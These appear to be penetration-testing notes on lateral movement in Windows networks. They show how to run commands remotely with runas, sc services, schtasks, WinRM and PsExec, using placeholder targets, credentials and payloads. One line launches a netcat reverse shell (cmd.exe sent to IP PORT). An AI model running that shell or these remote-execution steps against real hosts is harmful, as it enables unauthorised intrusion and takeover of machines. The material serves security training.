Spawning Processes Remotely

Required Privileges: Administrators

Windows Services can also be leveraged to run arbitrary commands since they execute a command when started. While a Service executable is technically different from a Regular Application, if we configure a Windows Service to run any application, it will still execute it and Fail Afterwards.

We can create a Service on a Remote Host with sc which is a Standard Tool available in Windows. When using sc, it will try to connect to the Service Control Manager (SVCCTL) Remote Service Program through RPC.

Running as Another User

Runas Allows a User to run specific tools and programs with Different Permissions than the User's current logon provides.

:: Spawning a Shell as [Another User] [Running Commands as the Other User]
runas /netonly /user:DOMAIN\USERNAME "C:\netcat.exe -e cmd.exe IP PORT"

Creating Services

:: Create a Remote Service
sc \\TARGET create SERVICE_NAME binPath= "Command/PAYLOAD To Run" start= auto

:: Start - Stop - Delete
sc \\TARGET start  "SERVICE_NAME"
sc \\TARGET stop   "SERVICE_NAME"
sc \\TARGET delete "SERVICE_NAME"

Creating Scheduled Tasks

:: Create
schtasks /s TARGET /RU "SYSTEM" /create /tn "TASK_NAME" /tr "Command/PAYLOAD To Run" /sc ONCE /sd 01/01/2024 /st 00:00

:: Run
schtasks /s TARGET /run /TN "TASK_NAME" 

:: List Tasks 
tasklist /v 

:: Delete Tasks
schtasks /s TARGET /TN "TASK_NAME" /DELETE /F

Remote Process Creation Using WinRM

Required Group Memberships: Remote Management Users

Windows Remote Management (WinRM) is a Web-Based Protocol used to send Powershell Commands to Windows Hosts remotely. Most Windows Server Installations will have WinRM enabled by Default.

CMD

:: Create Interactive Session
winrs -u:USERNAME -p:PASSWORD -r:TARGET cmd

PSH

# Creating PSCredential Object
$username = 'USERNAME';
$password = 'PASSWORD';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

# Create Interactive Session [Enter-PSSession]
Enter-PSSession -Computername TARGET -Credential $credential

# Run Commands Remotely [Invoke-Command]
Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

PsExec

Required Privileges: Administrators

Allows an Administrator User to run Commands Remotely on any PC where he has Access.

:: Accept the [Eula] otherwise the Command won't Work
PsExec64.exe -accepteula
PsExec64.exe \\TARGET_IP -u USERNAME -p PASSWORD -i cmd.exe